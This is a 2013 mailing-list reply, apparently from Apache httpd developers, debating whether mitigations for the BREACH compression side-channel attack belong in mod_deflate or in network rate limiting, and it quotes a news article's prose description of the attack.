Am 10.08.2013 21:28, schrieb Stefan Fritsch: > Am Freitag, 9. August 2013, 22:04:22 schrieb Joe Orton: >> On Fri, Aug 09, 2013 at 09:14:51AM -0700, Paul Querna wrote: >>> In this case, I don't know if any of the proposed mitigations >>> help; >>> I'd love to have an easy way to validate that, so we could bring >>> data to the discussion: If it increases the attack by multiple >>> hours, and causes a <1% performance drop, isn't that the kind of >>> thing that is useful? >> >> I sympathise with Stefan but I agree we should do something if we >> can find something cheap, effective and reliable. > > Effective is difficult when done on the server. OTOH, browsers could > just not send "Accept-Encoding: gzip" if a request is cross-domain and > contains some sort of credentials (HTTP-auth, cookies with the > 'secure' attribute, client certificate, ...). I think that would stop > the vast majority of attack scenarios. I very much doubt that any > measure at the server side can achieve a comparable level of > protection
IMHO that is all the wrong train "victim's browser to visit the targeted website thousands of times" for me says clearly that a proper server with rate-controls based on iptable sor a firewall in front of the machine would stop this and honestly these days i would not connect any production server without rate-controls to the world wide web so i am strictly against mangle in the procotol and risk making mod_defalte less effective, protections aginst such attacks do not belong in the application layer http://www.theregister.co.uk/2013/08/02/breach_crypto_attack/ >> The attacker's booby-trapped website hosts a script that runs the second >> phase of the attack: this forces the victim's browser to visit the targeted >> website thousands of times, over and over, each time appending a different >> combination of extra data. When the attacker-controlled bytes match any >> bytes originally encrypted in the stream, the browser's compression kicks >> in and reduces the size of the transmission, a subtle change the eavesdropper >> can detect
signature.asc
Description: OpenPGP digital signature
